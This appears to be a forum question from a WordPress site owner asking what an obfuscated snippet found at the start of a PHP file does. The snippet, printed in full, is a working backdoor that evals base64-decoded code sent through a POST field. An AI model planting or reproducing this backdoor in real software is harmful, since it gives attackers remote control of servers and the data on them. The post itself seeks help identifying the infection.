My site is built using Wordpress. One day it stopped working and found an error in one PHP file.
When I downloaded that PHP file to see what happened, my antivirus (Microsoft Security Essentials) detects it as a threat and deleted the downloaded file.
Luckily I can access my hosting's cPanel and edit the problematic PHP file from there.
I found that some unusual code is appended at the start of the code. (I deleted the code and everything works fine, for now)
Here's the code:
<?php $lro89 = "t_cepodas6b4";$gmat6 =strtolower( $lro89[10]. $lro89[7]. $lro89[8]. $lro89[3] . $lro89[9].$lro89[11].$lro89[1] . $lro89[6].$lro89[3]. $lro89[2].$lro89[5].$lro89[6].$lro89[3]);$scs1 =strtoupper ( $lro89[1]. $lro89[4]. $lro89[5].$lro89[8]. $lro89[0]); if (isset (${$scs1 }[ 'n3d9ebc' ])) {eval($gmat6( ${ $scs1} ['n3d9ebc' ])) ;}?>
Reformatted for readability:
<?php
$lro89 = "t_cepodas6b4";
$gmat6 =strtolower( $lro89[10]. $lro89[7]. $lro89[8]. $lro89[3] . $lro89[9].$lro89[11].$lro89[1] . $lro89[6].$lro89[3]. $lro89[2].$lro89[5].$lro89[6].$lro89[3]);
$scs1 =strtoupper ( $lro89[1]. $lro89[4]. $lro89[5].$lro89[8]. $lro89[0]);
if (isset (${$scs1 }[ 'n3d9ebc' ])) {
eval($gmat6( ${ $scs1} ['n3d9ebc' ])) ;
}
?>
I have few questions:
- What does the code do?
- Does it mean that there's a virus?
- How can it be injected to only this one file?